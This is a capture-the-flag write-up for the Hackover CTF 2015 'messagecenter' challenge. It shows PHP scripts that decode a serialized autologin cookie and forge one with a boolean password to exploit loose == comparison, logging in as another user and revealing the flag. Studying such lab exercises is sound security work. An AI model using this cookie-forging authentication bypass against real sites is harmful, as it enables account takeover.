Hackover CTF 2015 – messagecenter

This writeup describes the solution for the messagecenter challenge in Hackover CTF 2015 held by Chaos Computer Club Hamburg.

Hackover CTF 2015 - Messagecenter - Task description

The task was … to find the flag …  as usual :D. So lets look at the website.

Hackover CTF 2015 - Messagecenter - Website

So we get a simple website with login fields and some information (demo login data, more username, etc.). When logging in using the “demo” account and “remember me” option we get this view:

Hackover CTF 2015 - Messagecenter - Login view

Nothing special – you can read and write messages. The website is vulnerable to Cross-Site-Scripting but besides other contestants no admin, alice, bob or other interesting session id can be stolen. So this is not the right way to a flag. Let’s look at the cookie data now.

Hackover CTF 2015 - Messagecenter - Cookie data

There is the php session id (PHPSESSID) and a second one that only exists when using the “remember me” login checkbox. At first it looks like some serialized data. Lets check this using a small php script.


  $cookie = "a%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22demo%22%3Bs%3A8%3A%22password%22%3Bs%3A40%3A%2289e495e7941cf9e40e6980d14a16bf023ccd4c91%22%3B%7D";

  $data = unserialize(urldecode($cookie));


When executing…

ruport@zentaur:~/hackover2015$ php cookie.php 
array(2) {
  string(4) "demo"
  string(40) "89e495e7941cf9e40e6980d14a16bf023ccd4c91"

Alright the username and password are directly encoded in the autologin cookie. Lets think about what the server does with this data. I will unserialize it and check for correct username and password using some database. As we all know php comparison is not type-safe when using simple == instead of ===.

If the server php uses unsafe comparison, changing the password type from string to boolean would allow to login with any username. Lets test this and write a small php script to prepare a cookie.


  $data = array('username' => "Alice", 'password' => True);

  $cookie = serialize($data);

  print urlencode($cookie);


The output after execution is:

ruport@zentaur:~/hackover2015$ php messagecenter.php 

After putting this new autologin cookie into the browser and refreshing the website we get a “very important” message in Alice’ inbox:

Hackover CTF 2015 - Messagecenter - Solution

The solution is “hackover15{typeSafetyToTheRescue}“.

Leave a Reply

Your email address will not be published. Required fields are marked *